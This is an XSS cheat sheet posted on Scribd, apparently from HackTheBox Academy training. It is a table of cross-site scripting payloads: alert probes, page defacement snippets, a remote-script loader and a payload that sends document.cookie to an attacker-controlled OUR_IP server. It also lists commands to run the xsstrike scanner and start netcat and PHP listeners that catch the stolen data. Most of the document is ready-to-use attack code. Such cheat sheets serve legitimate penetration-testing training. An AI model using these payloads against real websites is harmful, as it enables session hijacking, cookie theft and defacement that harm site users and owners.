Scribd
Upload
116 views

Xss Cheatsheet

This document contains a table with XSS payload codes that can be used to alter aspects of a website like changing the background color or title. It also includes commands for running the XSS tool xsstrike on a URL parameter and starting netcat and PHP servers to receive data from successful payloads.

Uploaded by

Anonymous (Akcent Hoong)
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
116 views

Xss Cheatsheet

This document contains a table with XSS payload codes that can be used to alter aspects of a website like changing the background color or title. It also includes commands for running the XSS tool xsstrike on a URL parameter and starting netcat and PHP servers to receive data from successful payloads.

Uploaded by

Anonymous (Akcent Hoong)
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

## Commands

| Code | Description |
| ----- | ----- |
| **XSS Payloads** |
| `<script>alert(window.origin)</script>` | Basic XSS Payload |
| `<plaintext>` | Basic XSS Payload |
| `<script>print()</script>` | Basic XSS Payload |
| `<img src="" onerror=alert(window.origin)>` | HTML-based XSS Payload |
| `<script>document.body.style.background = "#141d2b"</script>` | Change Background
Color |
| `<script>document.body.background = "https://www.hackthebox.eu/images/logo-
htb.svg"</script>` | Change Background Image |
| `<script>document.title = 'HackTheBox Academy'</script>` | Change Website Title |
| `<script>document.getElementsByTagName('body')[0].innerHTML = 'text'</script>` |
Overwrite website's main body |
| `<script>document.getElementById('urlform').remove();</script>` | Remove certain
HTML element |
| `<script src="http://OUR_IP/script.js"></script>` | Load remote script |
| `<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>` |
Send Cookie details to us |
| **Commands** |
| `python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test"` | Run
`xsstrike` on a url parameter |
| `sudo nc -lvnp 80` | Start `netcat` listener |
| `sudo php -S 0.0.0.0:80 ` | Start `PHP` server |

You might also like